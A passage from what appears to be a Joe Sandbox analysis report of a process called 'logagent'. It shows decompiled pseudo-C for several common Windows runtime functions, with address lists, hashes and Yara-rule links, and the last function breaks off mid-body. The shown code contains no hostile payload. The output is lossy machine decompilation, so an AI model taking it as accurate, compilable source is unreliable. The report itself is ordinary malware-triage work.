                                              0x051ee7cc
                                              0x00000000
                                              0x051ee7d3
                                              0x051ee7d6
                                              0x00000000
                                              0x00000000
                                              0x051ee7ff
                                              0x051ee802
                                              0x00000000
                                              0x00000000
                                              0x051ee7f9
                                              0x051ee7fc
                                              0x00000000
                                              0x00000000
                                              0x051ee7f3
                                              0x051ee7f6
                                              0x00000000
                                              0x00000000
                                              0x051ee7ed
                                              0x051ee7f0
                                              0x00000000
                                              0x00000000
                                              0x051ee7e7
                                              0x051ee7ea
                                              0x00000000
                                              0x00000000
                                              0x0522b685
                                              0x0522b688
                                              0x00000000
                                              0x00000000
                                              0x0522b682
                                              0x00000000
                                              0x00000000
                                              0x051ee7cc
                                              0x051ee7d9
                                              0x051ee7dc
                                              0x051ee7de
                                              0x051ee7de
                                              0x051ee7ac
                                              0x051ee7e4
                                              0x051ee74b
                                              0x051ee751
                                              0x051ee759
                                              0x051ee761
                                              0x051ee761

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e64b3744ce991d94a8290afbd641a3e6329bbdb02b9a9c0a7921f70c7737fffd
                                              • Instruction ID: 99fda1809e617a9bec3989cf34b87a20d0f58359310e54c1200cc45ab5755e51
                                              • Opcode Fuzzy Hash: e64b3744ce991d94a8290afbd641a3e6329bbdb02b9a9c0a7921f70c7737fffd
                                              • Instruction Fuzzy Hash: DC316D75A14249AFD744DF58D845F9ABBE8FB09314F14825AF904CB341D771ED80CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EBC2C Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E051EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x52a6100; // 0x1a
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E051D2280(0xd, 0x19d3f1a0);
				_t41 =  *0x52a60f8; // 0x0
				if(_t41 != 0) {
					 *0x52a60f8 =  *_t41;
					 *0x52a60fc =  *0x52a60fc + 0xffff;
				}
				E051CFFB0(_t41, 0x800, 0x19d3f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x52a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L051D4620(0x52a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x52a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                              0x051ebc36
                                              0x051ebc42
                                              0x051ebc45
                                              0x051ebc4a
                                              0x051ebd35
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051ebc50
                                              0x051ebc50
                                              0x051ebc58
                                              0x051ebc5a
                                              0x051ebc60
                                              0x00000000
                                              0x00000000
                                              0x0522a4f2
                                              0x0522a4f6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0522a4fc
                                              0x051ebc79
                                              0x051ebc7e
                                              0x051ebc86
                                              0x051ebd16
                                              0x051ebd20
                                              0x051ebd20
                                              0x051ebc8d
                                              0x051ebc94
                                              0x051ebcbd
                                              0x051ebcca
                                              0x051ebccb
                                              0x051ebccc
                                              0x051ebccd
                                              0x051ebcce
                                              0x051ebcd4
                                              0x051ebcea
                                              0x051ebcee
                                              0x051ebcf2
                                              0x051ebd00
                                              0x051ebd04
                                              0x00000000
                                              0x051ebc96
                                              0x051ebcab
                                              0x051ebcaf
                                              0x051ebd2c
                                              0x051ebd2c
                                              0x051ebd09
                                              0x00000000
                                              0x051ebd09
                                              0x051ebcb1
                                              0x051ebcb5
                                              0x051ebcbb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051ebcbb

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 29575e8dfb1a50b823f1440742cc356ec96f3a2eaac0afbe83a085a68a00b838
                                              • Instruction ID: 634651980d964023fd49f5f37c3f96f18503a21a56af3d2a846b573134f68193
                                              • Opcode Fuzzy Hash: 29575e8dfb1a50b823f1440742cc356ec96f3a2eaac0afbe83a085a68a00b838
                                              • Instruction Fuzzy Hash: 0F31543AA18A159FCB11DF58D4C07A677B1FF08314F090079EC15EB241EB78E945CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B9100 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E051B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x528f6e8);
				E0520D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E052888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0520D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x52a86c0; // 0x34507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x52a86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E051D2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E052888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E051FAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x52ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x52a84c0;
										if(_t69 >=  *0x52a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05289063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E051B922A(_t82);
							_t53 = E051D7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05288B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x52a86c0; // 0x34507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x52a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x52a86bc;
										_t72 = 0x52a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E051B9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x52a86c4;
									_t72 = 0x52a86c0;
									L18:
									E051E9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                              0x051b9100
                                              0x051b9100
                                              0x051b9100
                                              0x051b9100
                                              0x051b9102
                                              0x051b9107
                                              0x051b910c
                                              0x051b9110
                                              0x051b9115
                                              0x051b9136
                                              0x051b9143
                                              0x052137e4
                                              0x052137e4
                                              0x051b9149
                                              0x051b914e
                                              0x051b914e
                                              0x051b9117
                                              0x051b911d
                                              0x00000000
                                              0x00000000
                                              0x051b911f
                                              0x051b9125
                                              0x00000000
                                              0x051b9151
                                              0x051b9158
                                              0x051b915d
                                              0x051b9161
                                              0x051b9168
                                              0x05213715
                                              0x00000000
                                              0x051b916e
                                              0x051b916e
                                              0x051b9175
                                              0x051b9177
                                              0x051b917e
                                              0x051b917f
                                              0x051b9182
                                              0x051b9182
                                              0x051b9187
                                              0x051b9187
                                              0x051b918a
                                              0x051b918d
                                              0x051b918f
                                              0x051b9192
                                              0x051b9195
                                              0x051b9198
                                              0x051b9198
                                              0x051b9198
                                              0x051b919a
                                              0x00000000
                                              0x00000000
                                              0x0521371f
                                              0x05213721
                                              0x05213727
                                              0x0521372f
                                              0x05213733
                                              0x05213735
                                              0x05213738
                                              0x0521373b
                                              0x0521373d
                                              0x05213740
                                              0x00000000
                                              0x00000000
                                              0x05213746
                                              0x05213749
                                              0x00000000
                                              0x00000000
                                              0x0521374f
                                              0x05213751
                                              0x00000000
                                              0x00000000
                                              0x05213757
                                              0x05213759
                                              0x0521375c
                                              0x0521375c
                                              0x0521375e
                                              0x0521375e
                                              0x05213761
                                              0x05213764
                                              0x00000000
                                              0x00000000
                                              0x05213766
                                              0x05213768
                                              0x052137a3
                                              0x052137a3
                                              0x052137a5
                                              0x052137a7
                                              0x052137ad
                                              0x052137b0
                                              0x052137b2
                                              0x052137bc
                                              0x052137c2
                                              0x052137c2
                                              0x052137b2
                                              0x051b9187
                                              0x051b9187
                                              0x051b918a
                                              0x051b918d
                                              0x051b918f
                                              0x051b9192
                                              0x051b9195
                                              0x00000000
                                              0x051b9195
                                              0x00000000
                                              0x051b9187
                                              0x0521376a
                                              0x0521376a
                                              0x0521376c
                                              0x0521376c
                                              0x0521376f
                                              0x05213775
                                              0x00000000
                                              0x00000000
                                              0x05213777
                                              0x05213779
                                              0x00000000
                                              0x00000000
                                              0x05213782
                                              0x05213787
                                              0x05213789
                                              0x05213790
                                              0x05213790
                                              0x0521378b
                                              0x0521378b
                                              0x0521378b
                                              0x05213792
                                              0x05213795
                                              0x05213795
                                              0x05213798
                                              0x05213798
                                              0x0521379b
                                              0x0521379b
                                              0x051b91a3
                                              0x051b91a9
                                              0x051b91b0
                                              0x051b91b4
                                              0x051b91b4
                                              0x051b91bb
                                              0x051b91c0
                                              0x051b91c5
                                              0x051b91c7
                                              0x052137da
                                              0x051b91cd
                                              0x051b91cd
                                              0x051b91cd
                                              0x051b91d2
                                              0x051b91d5
                                              0x051b9239
                                              0x051b9239
                                              0x051b91d7
                                              0x051b91db
                                              0x051b91e1
                                              0x051b91e7
                                              0x051b91fd
                                              0x051b9203
                                              0x051b921e
                                              0x051b9223
                                              0x00000000
                                              0x051b9223
                                              0x051b9205
                                              0x051b9208
                                              0x051b920c
                                              0x051b9214
                                              0x051b9214
                                              0x051b91e9
                                              0x051b91e9
                                              0x051b91ee
                                              0x051b91f3
                                              0x051b91f3
                                              0x051b91f3
                                              0x051b91e7
                                              0x00000000
                                              0x051b91db
                                              0x051b9187
                                              0x051b9168

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b046d781c99ae11bd41cc4aef8252e0a924d4ccb6dab67593763f1790e0b2ed
                                              • Instruction ID: ccc0c764b0cc04a0781b44fc3e5bc380bbcc0e82b2a7198b7b1d0d0abddb7c11
                                              • Opcode Fuzzy Hash: 3b046d781c99ae11bd41cc4aef8252e0a924d4ccb6dab67593763f1790e0b2ed
                                              • Instruction Fuzzy Hash: D331E775A15245DFFB25DF68C08CBEDBBF2BF88320F188149D61567281C3B4A981DB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E1DB5 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E051E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E051DF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L051D4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E051DF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                              0x051e1dc2
                                              0x051e1dc5
                                              0x051e1dc7
                                              0x051e1dcc
                                              0x051e1dce
                                              0x051e1dd6
                                              0x051e1ddf
                                              0x051e1de0
                                              0x051e1de1
                                              0x051e1de5
                                              0x051e1de8
                                              0x051e1def
                                              0x051e1df0
                                              0x051e1df6
                                              0x051e1df7
                                              0x051e1dfe
                                              0x051e1e1a
                                              0x00000000
                                              0x00000000
                                              0x051e1e0b
                                              0x051e1e12
                                              0x051e1e12
                                              0x051e1e00
                                              0x051e1e00
                                              0x051e1e05
                                              0x051e1e1e
                                              0x051e1e23
                                              0x0522570f
                                              0x05225713
                                              0x00000000
                                              0x00000000
                                              0x05225719
                                              0x05225719
                                              0x051e1e2c
                                              0x051e1e2d
                                              0x051e1e2e
                                              0x051e1e2f
                                              0x051e1e31
                                              0x051e1e32
                                              0x051e1e35
                                              0x051e1e3d
                                              0x05225723
                                              0x0522573d
                                              0x0522573d
                                              0x00000000
                                              0x05225723
                                              0x051e1e49
                                              0x051e1e4e
                                              0x051e1e4e
                                              0x051e1e09
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                              • Instruction ID: 6418c7ebf4b8b8f2161e9e322d727bdaf71129cf7e8effc73a94bbc6270d7880
                                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                              • Instruction Fuzzy Hash: 6F219C72640518FFC726CF99CC84EAABBBAFF85740F154055F906AB250D730AE41CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051D0050 Relevance: .1, Instructions: 81COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E051D0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x52ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E051E9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E051FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05288A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E051E9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x52ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                              0x051d0055
                                              0x051d005d
                                              0x051d0062
                                              0x051d006c
                                              0x051d006f
                                              0x051d0074
                                              0x051d007a
                                              0x051d007a
                                              0x051d0080
                                              0x051d0080
                                              0x051d0087
                                              0x051d008d
                                              0x051d008f
                                              0x051d0093
                                              0x051d0095
                                              0x051d009b
                                              0x051d00f8
                                              0x051d00fb
                                              0x051d00fc
                                              0x051d00ff
                                              0x051d0108
                                              0x051d0108
                                              0x051d00a2
                                              0x051d00a6
                                              0x051d00b3
                                              0x051d00bc
                                              0x051d00c5
                                              0x051d00ca
                                              0x0521c01e
                                              0x00000000
                                              0x00000000
                                              0x0521c02d
                                              0x051d00d5
                                              0x051d00d9
                                              0x0521c03d
                                              0x0521c046
                                              0x0521c046
                                              0x051d00df
                                              0x051d00e2
                                              0x051d00ea
                                              0x051d00ef
                                              0x051d00f2
                                              0x051d00f6
                                              0x051d0111
                                              0x051d0117
                                              0x051d0117
                                              0x00000000
                                              0x051d00f6
                                              0x051d00d0
                                              0x051d00d0
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7fdf57d95bc5061d53273d17a99bdc05890ad85733b8fc233ef36765520ba7eb
                                              • Instruction ID: 147722e1608498f5537449e0d7ae08f377d799af695ca052c45024b4223bdaaa
                                              • Opcode Fuzzy Hash: 7fdf57d95bc5061d53273d17a99bdc05890ad85733b8fc233ef36765520ba7eb
                                              • Instruction Fuzzy Hash: 0131BF31211B04DFD725CF28C848B6AB7E6FF88754F14456DE49A87B90EB75AC01CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05236C0A Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E05236C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E051D7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x52a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L051D4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E051FF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E051D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E051F9AE0();
						_t23 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                              0x05236c0a
                                              0x05236c0f
                                              0x05236c10
                                              0x05236c13
                                              0x05236c15
                                              0x05236c19
                                              0x05236c1c
                                              0x05236c21
                                              0x05236c28
                                              0x05236c3a
                                              0x05236c2a
                                              0x05236c33
                                              0x05236c33
                                              0x05236c3f
                                              0x05236c48
                                              0x05236c4d
                                              0x05236c60
                                              0x05236c65
                                              0x05236c69
                                              0x05236c73
                                              0x05236c79
                                              0x05236c7f
                                              0x05236c86
                                              0x05236c90
                                              0x05236c94
                                              0x05236ca6
                                              0x05236cb2
                                              0x05236cbd
                                              0x05236cbd
                                              0x05236cc3
                                              0x05236cc7
                                              0x05236ccb
                                              0x05236cd0
                                              0x05236cd1
                                              0x05236ce2
                                              0x05236ce2
                                              0x05236c69
                                              0x05236ced

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96b485909ff0fd0888956c785c3b17be9169e4c330468a258ba2391c489d589e
                                              • Instruction ID: 64a012b551531d1353df354f1dbe50bd25e0bab02ac6e0345b4c62a5afcfc17b
                                              • Opcode Fuzzy Hash: 96b485909ff0fd0888956c785c3b17be9169e4c330468a258ba2391c489d589e
                                              • Instruction Fuzzy Hash: 54219AB2A10644BBC711DB68D888F2AB7A8FF48700F140069F909C77A1D734ED10CBA8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F90AF Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E051F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0520D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E051EE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L051D4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E051FF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
